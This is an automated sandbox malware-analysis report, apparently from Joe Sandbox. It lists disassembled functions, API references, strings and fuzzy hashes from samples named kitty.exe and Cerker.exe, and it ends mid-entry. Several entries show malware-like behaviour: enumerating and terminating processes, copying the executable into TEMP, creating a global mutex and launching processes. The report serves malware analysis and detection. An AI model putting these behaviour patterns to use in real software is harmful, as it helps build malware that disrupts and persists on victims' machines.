___AdjustPointer.LIBCMT ref: 001F2D57

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 0aa7598133044e2a90096d83223047e5076ac6c4eb07ebc0f6e559742e1ad09a
Instruction ID: 29d134cbf633d5efc371aee08dded6d08911fee582c3a85f2f75102792fa018b
Opcode Fuzzy Hash: 0aa7598133044e2a90096d83223047e5076ac6c4eb07ebc0f6e559742e1ad09a
Instruction Fuzzy Hash: 5651F0B660060EAFDB298F94D841BBA77B4FF14714F24412DEE09972A1E735ED81CB90

Function 0020BA74 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0020BB44
_free.LIBCMT ref: 0020BB6D
SetEndOfFile.KERNEL32(00000000,00209E5D,00000000,0020A0F4,?,?,?,?,?,?,?,00209E5D,0020A0F4,00000000), ref: 0020BB9F
GetLastError.KERNEL32(?,?,?,?,?,?,?,00209E5D,0020A0F4,00000000,?,?,?,?,00000000), ref: 0020BBBB

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 9fc47ac7bc8bf8c576d93298e15bf1bd6b1807eee4e7146e7d9a68ffd03c59e6
Instruction ID: db7c5c65d6b1967dc474ff0c721d8a5ec65fe0cab3b2eee8814837b092eec34d
Opcode Fuzzy Hash: 9fc47ac7bc8bf8c576d93298e15bf1bd6b1807eee4e7146e7d9a68ffd03c59e6
Instruction Fuzzy Hash: D741C37292470AABCB32AFB8CC46BAD7AA5EF54364F240510F914A71D7EB7088214B60

Function 002035F6 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 001F8544: _free.LIBCMT ref: 001F8552

Part of subcall function 002031EB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,00200B70,?,00000000,00000000), ref: 00203297

GetLastError.KERNEL32 ref: 0020365E
__dosmaperr.LIBCMT ref: 00203665
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 002036A4
__dosmaperr.LIBCMT ref: 002036AB

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: af22fc8d86e4f15e9699bedf8be87d9a8a02442d33fd80e45b076f7296bcd920
Instruction ID: 981c443500ff02971c50b2ec5f750c7fd7de6ee8195e7f32ff32796d8a2aea02
Opcode Fuzzy Hash: af22fc8d86e4f15e9699bedf8be87d9a8a02442d33fd80e45b076f7296bcd920
Instruction Fuzzy Hash: B921A471624306BFDB10DF658C80D7AB7ADEF143647104518F918972D3D772EE608B94

Function 001FBBF0 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(001D1920,00000001,001D1924,001F5E6D,00000001,00000000,00000000,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBBF5
_free.LIBCMT ref: 001FBC52
_free.LIBCMT ref: 001FBC88
SetLastError.KERNEL32(00000000,00000006,000000FF,?,001FBEE5,00000000,00000000,00000001,00000000,001D1920,00000104), ref: 001FBC93

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: f1b7caf91635ab87e1e7c842ff081d4146711d9f914130467d46d4efafca5eb9
Instruction ID: dc619bf7c682fe3dafbf2e3a9590b903de85616243afa14199e82456064afd4f
Opcode Fuzzy Hash: f1b7caf91635ab87e1e7c842ff081d4146711d9f914130467d46d4efafca5eb9
Instruction Fuzzy Hash: 9A11C67220820D3EDA1136B8EDCAD7B2659ABE13B5B360A24F729D71E2DF718D005150

Function 001FBD47 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,001F7C8B,001FFB20,?,?,001F0A38,?,?,?,?,?,001D11E3,?,?), ref: 001FBD4C
_free.LIBCMT ref: 001FBDA9
_free.LIBCMT ref: 001FBDDF
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,001F0A38,?,?,?,?,?,001D11E3,?,?), ref: 001FBDEA

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: a93657bb0706a01976cb06eb8c26bb459c9e3f83504e0b62d56aacc945b879ee
Instruction ID: d38a27251654564d4f8cd4212e72d4fe1ab2d67a507507e27586783d9050b549
Opcode Fuzzy Hash: a93657bb0706a01976cb06eb8c26bb459c9e3f83504e0b62d56aacc945b879ee
Instruction Fuzzy Hash: DA11A57230860C7ADA1236F8ECC9D7A2659EBE13BCB390624F729D21E2DF718D005651

Function 001D1330 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

K32EnumProcesses.KERNEL32(?,00001000,?), ref: 001D134D
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 001D1397
TerminateProcess.KERNEL32(00000000,00000000), ref: 001D13A2
CloseHandle.KERNEL32(00000000), ref: 001D13A9

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: Process$CloseEnumHandleOpenProcessesTerminate
String ID:
API String ID: 1176117389-0
Opcode ID: 842b48ca22aa00030d778a0f481bf010e9790e067946a9418aa0cdda047b5f01
Instruction ID: 8da377ce209bf2464b113ee799394c938235015ded8ba711edc555b4f1eae7b2
Opcode Fuzzy Hash: 842b48ca22aa00030d778a0f481bf010e9790e067946a9418aa0cdda047b5f01
Instruction Fuzzy Hash: 2601A272A003487BEB219AE5FC45FEE739DAB09761F000172FF0CD2641EBA1ED814665

Function 0020B64D Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000010,00000000,00000000,?,00207FB2,00000000,00000001,00000000,00000000,?,001FD38D,?,00000010,00000000), ref: 0020B664
GetLastError.KERNEL32(?,00207FB2,00000000,00000001,00000000,00000000,?,001FD38D,?,00000010,00000000,?,00000000,?,001FD8D9,00000010), ref: 0020B670

Part of subcall function 0020B636: CloseHandle.KERNEL32(FFFFFFFE,0020B680,?,00207FB2,00000000,00000001,00000000,00000000,?,001FD38D,?,00000010,00000000,?,00000000), ref: 0020B646

___initconout.LIBCMT ref: 0020B680

Part of subcall function 0020B5F8: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0020B627,00207F9F,00000000,?,001FD38D,?,00000010,00000000,?), ref: 0020B60B

WriteConsoleW.KERNEL32(00000000,00000000,00000010,00000000,?,00207FB2,00000000,00000001,00000000,00000000,?,001FD38D,?,00000010,00000000,?), ref: 0020B695

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 0bdbb5c4aa7db4f26b0c46d94b4f7981d48500100c8f2a2577b58938973c0d61
Instruction ID: e85d55e5fedc77c3cf327ece4ef9ef1195d210cda22474c38ac81bf56815421a
Opcode Fuzzy Hash: 0bdbb5c4aa7db4f26b0c46d94b4f7981d48500100c8f2a2577b58938973c0d61
Instruction Fuzzy Hash: 52F0983A551255BBCF321FD5EC48A9E3F2AFB187A1F054420FE1995162CB328920DB90

Function 001FADFF Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001FAE08

Part of subcall function 001FBF97: HeapFree.KERNEL32(00000000,00000000,?,00205589,?,00000000,?,?,?,0020582C,?,00000007,?,?,00205D1F,?), ref: 001FBFAD
Part of subcall function 001FBF97: GetLastError.KERNEL32(?,?,00205589,?,00000000,?,?,?,0020582C,?,00000007,?,?,00205D1F,?,?), ref: 001FBFBF

_free.LIBCMT ref: 001FAE1B
_free.LIBCMT ref: 001FAE2C
_free.LIBCMT ref: 001FAE3D

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1e4f1b360327af778c4eecd931e7e47c1691649136f2d0f56615e2a847a0b8ab
Instruction ID: 7c89e05ba8b032673de0eabe00aa252b226a53b92174fc4627d682ed1166fe08
Opcode Fuzzy Hash: 1e4f1b360327af778c4eecd931e7e47c1691649136f2d0f56615e2a847a0b8ab
Instruction Fuzzy Hash: 15E086B1808728BF96516F54FDCA4A53F21EB24760B405016F41882233CF710273DFC8

Function 001DE130 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001DE460

Strings

0, xrefs: 001DE35A
H, xrefs: 001DE29C

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID: 0$H
API String ID: 323602529-1388647558
Opcode ID: 069ffe822df240b6311e98576f9e069792e52322481a9b35f2c7744afedef9d9
Instruction ID: 9da77872a2e707a2cfc195f7d04134135f5fb893b3b5167816a6fdafa49f332d
Opcode Fuzzy Hash: 069ffe822df240b6311e98576f9e069792e52322481a9b35f2c7744afedef9d9
Instruction Fuzzy Hash: D7A15E74A003589FDB14DF58C884BDDBBB5BF59300F1485E9E449AB341D770AA88CF51

Function 001F826D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 001F82FD

Strings

pow, xrefs: 001F82D5, 001F82F2

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: bc5af7a9479075e4c9f8b1e2eb6b5d52666aaff3400a2a7418de24ce3e1b5b45
Instruction ID: 843fcf94f7d97a7dbfbeefed0ce2db5f3e695fb6540ebc4f61b8fc75aa67e94c
Opcode Fuzzy Hash: bc5af7a9479075e4c9f8b1e2eb6b5d52666aaff3400a2a7418de24ce3e1b5b45
Instruction Fuzzy Hash: 52519E60A24307C6CB11BB14DD0D37967A0EB10B50F24895AF5C5822FADF34CCA9DA46

Function 001F8B3C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe, xrefs: 001F8B7F, 001F8B86, 001F8BBC

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe
API String ID: 0-706622493
Opcode ID: 69ca1ea362109d2ce70df44a06e1f1c10d8c5e64469a731a8a30675dbc7a1973
Instruction ID: ffd9a6f8994de700679f419b3bc45ee07ce53b26e041b91ea5fffe11a9da4449
Opcode Fuzzy Hash: 69ca1ea362109d2ce70df44a06e1f1c10d8c5e64469a731a8a30675dbc7a1973
Instruction Fuzzy Hash: BF41A0B1A0031CAFCB25EF99DD859FEBBB9EF94310F104066E614E7252DB709A40CB60

Function 001F28C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 001F28FF
__IsNonwritableInCurrentImage.LIBCMT ref: 001F29B3

Strings

csm, xrefs: 001F299D

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 122138e33cd4b528984aa7d92de7fb88496f4b9786e4925695686ce3a5c1c519
Instruction ID: 036ada01be5514621f4582cf13780d8bb2f2f323cc656a7591e014bb75c92884
Opcode Fuzzy Hash: 122138e33cd4b528984aa7d92de7fb88496f4b9786e4925695686ce3a5c1c519
Instruction Fuzzy Hash: 1941E834A0021D9BCF10DF68C885AFE7BF1BF45328F148155E955AB392C7B1DA51CB90

Function 001F31D2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 001F31F7

Strings

RCC, xrefs: 001F3211
MOC, xrefs: 001F3209

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 546995f6c0c0e0a601300a7c2f03312783b2e571e2126307327fb6ce6063424c
Instruction ID: 8b8e33b50ffcec3155db1159027b968a2312fec8690bbbfaebf42e27e0080f4f
Opcode Fuzzy Hash: 546995f6c0c0e0a601300a7c2f03312783b2e571e2126307327fb6ce6063424c
Instruction Fuzzy Hash: D441477290020DEFDF15DF98CC82AAEBBB6BF48304F188159FA24A7211D3359A50DB60

Function 001F4112 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001F4140
_free.LIBCMT ref: 001F4166

Strings

X!, xrefs: 001F41CD

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free
String ID: X!
API String ID: 269201875-2472369151
Opcode ID: 0d032ed66ef5a37045e3fd1147ad75c28276051ed9bd5f858130ce74c106a3db
Instruction ID: d4b6b4eb927e921de4e823b342415baa1dd67d723529469b7c34d5ae72caafb6
Opcode Fuzzy Hash: 0d032ed66ef5a37045e3fd1147ad75c28276051ed9bd5f858130ce74c106a3db
Instruction Fuzzy Hash: C611D671A086095BDB609B28FD55BA73694A779734F144636FB20CB2D0E770D9824B40

Function 002058F7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0020593E

Strings

8,!, xrefs: 0020590C

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: _free
String ID: 8,!
API String ID: 269201875-2690717386
Opcode ID: 40bbc5b9e921c7b8c28f371af5188f28bd17236bd4a48848ece7dd390be8caaa
Instruction ID: 8b25fbeedbb12e78dc115564d72b138980ca92599c0fbf3c70a37940da31b32a
Opcode Fuzzy Hash: 40bbc5b9e921c7b8c28f371af5188f28bd17236bd4a48848ece7dd390be8caaa
Instruction Fuzzy Hash: AEF0A93243CB29AAE7102961AC41BAB3B98DB51770F14003AF9089A0C3DB6108514EF5

Function 001D2070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 001D2078
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001D20BC

Part of subcall function 001EE9C0: _Yarn.LIBCPMT ref: 001EE9DF
Part of subcall function 001EE9C0: _Yarn.LIBCPMT ref: 001EEA03

Strings

bad locale name, xrefs: 001D20CB

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: aba6d9e951a5b42fe37fa2a71c3e19721168a168c9e592e1b35a5dec3c5a8e94
Instruction ID: 505c4fb1adb4fba5dca671e49f86c79aab7c526ebe26437b39ff8d0c09dc64b5
Opcode Fuzzy Hash: aba6d9e951a5b42fe37fa2a71c3e19721168a168c9e592e1b35a5dec3c5a8e94
Instruction Fuzzy Hash: 02F01D71111B809ED370DF7A9405747BEE4AF29714F044A1EE58AC7B42E375E508CBE6

Function 001EE22A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 001EE272
___std_exception_destroy.LIBVCRUNTIME ref: 001EE289

Strings

Unknown exception, xrefs: 001EE22D, 001EE23D

Memory Dump Source

Source File: 00000004.00000002.1742756982.00000000001D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000004.00000002.1742642210.00000000001D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743059693.000000000020D000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743212393.000000000021E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.1743288638.0000000000221000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d0000_kitty.jbxd

Similarity

API ID: Sleep___std_exception_destroy
String ID: Unknown exception
API String ID: 2427919145-410509341
Opcode ID: fd2700eafc654d62f99b63fd24775d312c908be453ac66d89b9f148b5e50edb4
Instruction ID: 957182aa06ed9be08e500036f2a6cad8b36ecf90e1b999d3641e4d259cf5ceab
Opcode Fuzzy Hash: fd2700eafc654d62f99b63fd24775d312c908be453ac66d89b9f148b5e50edb4
Instruction Fuzzy Hash: 76F0E2B0B017105BCB08EBA5DC56A6D77E99F98300FC00098FA0A97383DB609F1586A6

Analysis Process: Cerker.exePID: 8164, Parent PID: 8052COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1103
Total number of Limit Nodes:	12

Executed Functions

Function 008C6620 Relevance: 46.7, APIs: 13, Strings: 12, Instructions: 2929synchronizationprocessfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNELBASE(00000000,00000000,?,00000000,Global\,00000007,?,?), ref: 008C682C
GetLastError.KERNEL32 ref: 008C68AC
GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 008C68CE
CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000,008FD8B8,00000001,?,?,?,?), ref: 008C6BC5
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 008C6BD9
CopyFileA.KERNEL32(?,00000000,00000000), ref: 008C6D4A
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?), ref: 008C75EA
WaitForSingleObject.KERNEL32(?,000000FF), ref: 008C75FC
CloseHandle.KERNEL32(?), ref: 008C760E
CloseHandle.KERNEL32(?), ref: 008C7616
ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 008C83FC
GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104,00000004,00000006), ref: 008C846F

Strings

E[?, xrefs: 008C8B7B
E[?, xrefs: 008C7029
E[?, xrefs: 008C8CE1
open, xrefs: 008C83F5
E[?, xrefs: 008C7A45
" /F, xrefs: 008C72F7
E[?, xrefs: 008C7B9E
E[?, xrefs: 008C7FE1
Global\, xrefs: 008C67EB
E[?, xrefs: 008C6E4A
E[?, xrefs: 008C6BDF
TEMP, xrefs: 008C68C9, 008C846A

Memory Dump Source

Source File: 00000007.00000002.1742592579.00000000008C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000007.00000002.1742565177.00000000008C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742637083.00000000008FD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742671172.000000000090E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.1742702576.0000000000911000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_8c0000_Cerker.jbxd

Similarity

API ID: Create$CloseEnvironmentFileHandleVariable$CopyDirectoryErrorExecuteLastModuleMutexNameObjectProcessShellSingleWait
String ID: " /F$E[?$E[?$E[?$E[?$E[?$E[?$E[?$E[?$Global\$TEMP$open
API String ID: 747220738-766119990
Opcode ID: aa3a1db46befc40c06acba2c7abee32f5b58602643b050d898ab397e6229439d
Instruction ID: 96fe4fc92e297357a7bf647ca9e10bc1b3bef5c9794e22bab9d3d27f3c464360
Opcode Fuzzy Hash: aa3a1db46befc40c06acba2c7abee32f5b58602643b050d898ab397e6229439d
Instruction Fuzzy Hash: D043C475D146488BEB06CB78C845BEDF7B5FF96344F14C39AE404B6662EB31AA85CB00

Function 008D8C8F Relevance: 26.0, APIs: 4, Strings: 8, Instructions: 5048COMMON

Download Yara Rule

Strings

